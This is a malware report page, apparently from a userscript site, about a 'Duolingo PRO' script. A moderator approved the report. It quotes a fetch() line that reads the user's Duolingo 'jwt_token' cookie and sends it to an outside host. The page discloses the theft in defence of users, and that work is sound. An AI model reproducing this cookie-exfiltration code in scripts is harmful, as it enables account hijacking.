Duolingo PRO bol nahlásený 23.03.2025 z dôvodu Malvér
Nahlasovateľ povedal:
This script grabs the JWT token of duolingo and sends it to a fishy link code below:
let apiURL = "https://api.duolingopro.net";
This is the real payload part
const response = await fetch(apiURL + "/feedback", { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}` }, body: JSON.stringify(payload) });
Tento skript už mal 1 potvrdené alebo opravené hlásenie.
anonymoushackerIV (nahlásený používateľ) urobil:
interstellar (nahlásený používateľ) urobil:
Táto sťažnosť bola moderátorom schválená.